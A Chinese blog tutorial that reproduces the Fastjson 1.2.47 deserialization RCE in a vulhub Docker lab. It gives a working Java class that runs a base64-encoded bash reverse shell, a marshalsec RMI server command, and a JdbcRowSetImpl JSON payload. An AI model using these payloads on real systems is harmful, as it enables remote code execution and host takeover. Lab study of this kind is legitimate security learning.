Fastjson反序列化漏洞

最新推荐文章于 2024-04-27 09:13:51 发布
最新推荐文章于 2024-04-27 09:13:51 发布
阅读量1.7w 收藏 17
点赞数 3
分类专栏: 面试 学习路线 阿里巴巴 文章标签: java 开发语言 缓存 jvm
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67401761/article/details/126801734
版权
面试 同时被 3 个专栏收录
109 篇文章 15 订阅
订阅专栏
阿里巴巴
109 篇文章 1 订阅
订阅专栏
学习路线
106 篇文章 3 订阅
订阅专栏

一、fastjson简介

fastjson是java的一个库,可以将java对象转化为json格式的字符串,也可以将json格式的字符串转化为java对象

提供了 toJSONString() 和 parseObject() 方法来将 Java 对象与 JSON 相互转换。调用toJSONString方 法即可将对象转换成 JSON 字符串,parseObject 方法则反过来将 JSON 字符串转换成对象。

二、fastjson反序列化漏洞原理

在反序列化的时候,会进入parseField方法,进入该方法后,就会调用setValue(object, value)方法,在这里,会执行构造的恶意代码,最后造成代码执行。 那么通过以上步骤,我们可以知道该漏洞的利用点有两个,第一是需要我们指定一个类,这个类的作用是为了让程序获取这个类来进行反序列化操作。第二是需要将需要执行的代码提供给程序,所以这里使用了rmi。 然后反序列化的时候会去请求rmi服务器,地址为: dnslog.cn/aaa。然后加载aaa这个恶意class文件从而造成代码执行。

三、fastjson反序列化漏洞的前提条件

  1. 目标服务器存在fastjson。
  2. 没有对用户传输的数据进行严格过滤。

四、复现fastjson反序列化漏洞

1.复现的步骤

(1)开启环境

  • 黑客使用payload攻击主机A(该payload需要指定rmi/ldap地址)
  • 主机A引发反序列化漏洞,进行ldap远程方法调用,去连接主机B的9999端口。
  • 主机B的LDAP服务指定加载主机C的恶意java类,所以主机A通过主机B的LDAP服务最终加载并执行主机C的恶意java类。
  • 主机A执行恶意Java类,主机B获得反弹shell,控制主机A。

2.进入docker容器进行复现

  1. cd 1.2.47-rce/
  2. docker-compose up -d 端口为:8090
  3. 访问
  5. 开启抓包确定是不是fastjson框架,通过修改请求包判断是否是fastjson框架 ,应为fastjson有一个严格的格式才能解析,否则会报错

(2)准备一个恶意的类

使用javac编译rmi.java文件 生成一个类文件

import java.lang.Runtime;
import java.lang.Process;

public class rmi{
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"bash", "-c","{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ0LjE3MC82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}
//YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ0LjE3MC82NjY2IDA+JjE= 这个是监听主机的ip地址和端口号

(3)然后将类文件放到监听的服务器上

(4)使用工具运行rmi文件

payload:java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://192.168.44.170/#rmi” 9999

(5)修改数据包中的post请求主体

{"a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.44.170:9999/rmi.class",
        "autoCommit":true}}

(6)然后进行端口监听

(7)点击go,发现反弹shell成功

最后

深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。

小编已加密:aHR0cHM6Ly9kb2NzLnFxLmNvbS9kb2MvRFVrVm9aSGxQZUVsTlkwUnc==出于安全原因,我们把网站通过base64编码了,大家可以通过base64解码把网址获取下来。

m0_67401761
关注
  • 3
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Java-Deserialization-Cheat-Sheet:关于Java反序列化漏洞的备忘单
05-02
Java反序列化备忘单 面向渗透测试人员和研究人员的备忘单,其中涉及各种JavaJVM)序列化库中的反序列化漏洞。 请使用#javadeser哈希标签进行鸣叫。 表中的内容 json-io(JSON) 杰克逊(JSON) Fastjson(JSON) Genson(JSON) Flexjson(JSON) 乔德(JSON) 红色5 IO AMF(AMF) Apache Flex BlazeDS(AMF) 火烈鸟AMF(AMF) GraniteDS(AMF) Java WebORB(AMF) SnakeYAML(YAML) jYAML(YAML) YamlBeans(YAML) “安全”反序列化 Java本机序列化(二进制) 概述 Java反序列化安全性常见问题解答 来自Foxgloves安全 主要演讲,演讲和文档 编组泡菜 通过@frohoff &
Fastjson反序列化漏洞原理与复现
FisrtBqy的博客
05-15 2720
Ffasjson反序列化漏洞原理与复现
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-12 2万+
本文是Fastjson1.2.24漏洞复现,包括漏洞原理、漏洞利用(远程创建文件)、漏洞利用(反弹shell)。使用vulhub靶场进行搭建,保姆级教程,还望大家多多支持。
fastjson反序列化漏洞
qq_63980959的博客
03-01 1031
Fastjson是一款开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化JavaBean。​ fastjson反序列化与weblogic、shiro反序列化类似,在客户端将json数据进行序列化传送至服务端后,服务端会将其反序列化读取其中数据,若客户端操控json数据,加入一些恶意类方法、代码,则可能会造成服务端代码执行。同时由于fastjson采用黑名单过滤的方式,也存在着被绕过的风险。
fastjson反序列化漏洞fastjson-1.2.47)
zyer
04-28 3962
fastjson 1.2.47 爆出了最为严重的漏洞,可以在不开启 AutoTypeSupport 的情况下进行反序列化的利用。 一.原理 测试代码Test.java import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.JSONObject; public class Test { public static void main(String[] args) { String s2 =...
fastjson1.2.8 反序列化远程代码执行漏洞
05-08
astjson采用黑白名单的方法来防御反序列化漏洞,导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过autoType限制,风险影响较大。
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6187
简单讲解Fastjson反序列化漏洞,简单讲述漏洞利用shell
fastjson反序列化漏洞学习(一)
一剑开天门!的博客
02-10 3551
Fastjson 反序列化漏洞产生的原因通常是由于 Fastjson 库在反序列化 JSON 数据时存在安全漏洞。这些漏洞可以被攻击者利用来执行任意代码、访问系统文件、读取敏感数据等危险操作。
Fastjson反序列化漏洞详解
zhuyi666的博客
03-13 2933
fastjson介绍:fastjson 是一个java语言编写的高性能且功能完善的JSON库,它采用一种“假定有序快速匹配”的算法,把JSON Parse 的性能提升到了极致。FastJson是啊里巴巴的的开源库,用与对JSON格式的数据进行解析和打包。速度快使用广泛测试完备使用简单功能完备JSON数据格式{"name":zy, "age":22, "flag":true, "gender":male, "address":cs}("key":value)
Fastjson反序列化漏洞史1
08-03
Fastjson 反序列化漏洞史2020年05月08日漏洞分析 (/category/vul-analysis/) · 404专栏 (/category/404
fastjson1.2.69反序列化远程代码执行漏洞介绍.docx
07-01
fastjson1.2.69反序列化远程代码执行漏洞介绍fastjson采用黑白名单的方法来防御反序列化漏洞,导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过autoType限制,风险影响较大。阿里云应急响应中心提醒fastjson用户尽快采取安全措施阻止漏洞攻击
Fastjson各版本反序列化EXP 1.2.24 1.2.41 1.2.42 1.2.43 1.2.45 48 62 66
03-29
# Fastjson反序列化漏洞为例 1、此时/tmp目录 ![img]...
FastJson 漏洞.md
05-27
FastJson 漏洞.md
mybatisPlus使用MetaObjectHandler对字段进行更新
m0_56356631的博客
04-23 817
都是符合我们的预期的。
java方法重写(重点讲),方法重载
最新发布
weixin_46281068的博客
04-27 878
一、方法重载定义:一个类中,出现多个方法的名称相同,但是它们的形参列表是不同的,那么这些方法就称为方法重载了。注意:一个类中,只要一些方法的名称相同、形参列表不同,那么它们就是方法重载了,其它的都不管(如:修饰符,返回值类型是否一样都无所谓)。形参列表不同指的是:形参的个数、类型、顺序不同,不关心形参的名称。应用场景:开发中我们经常需要为处理一类业务,提供多种解决方案,此时用方法重载来设计是很专业的。
string模拟实现
m0_73969414的博客
04-23 1821
c++中string的模拟实现,面试必会知识点
实现自定义注解、实现自定义幂等性注解
qq_44721738的博客
04-23 1082
添加 Spring AOP 依赖。创建自定义注解。创建一个新的 Java 注解类,通过@interface关键字来定义,并可以添加元注解以及属性。@Target(ElementType.METHOD) //表示作用于方法上@Retention(RetentionPolicy.RUNTIME) // 表示这个注解在运行时是可见的,这样 AOP 代理才能在运行时读取到这个注解编写 AOP 拦截(自定义注解)的逻辑代码。@Aspect@Component// 方法执行前的处理。
fastjson 反序列化漏洞
08-24
fastjson 反序列化漏洞是指在使用 fastjson 库解析 JSON 字符串时存在安全风险的问题。具体来说,fastjson 反序列化漏洞是由于 fastjson 在处理特定的恶意构造的 JSON 字符串时,可能会触发不安全的反序列化操作,导致攻击者能够执行任意代码或进行其他恶意操作。 这种漏洞通常是由于 fastjson反序列化过程中缺乏足够的安全检查和过滤机制,导致恶意用户能够构造特定的 JSON 字符串来触发漏洞。攻击者可以通过在 JSON 字符串中插入恶意的 Java 代码或利用已知的 Java 反序列化漏洞来执行任意代码。 为了防止 fastjson 反序列化漏洞的利用,建议遵循以下几点: 1. 尽量避免使用 fastjson 库,可以考虑使用其他更安全的 JSON 库。 2. 更新 fastjson 到最新版本,以获取最新的修复和安全增强功能。 3. 对用户输入的 JSON 字符串进行严格的验证和过滤,确保只有合法的、受信任的数据被反序列化。 4. 配置 fastjson 的 ParserConfig,限制反序列化操作只能处理预期的类型。 5. 避免在反序列化过程中执行不可信的代码,尽量将反序列化操作限制在有限的安全环境中。 总之,fastjson 反序列化漏洞是一个需要注意和防范的安全问题,开发者在使用 fastjson 库时应当保持警惕并采取相应的安全措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值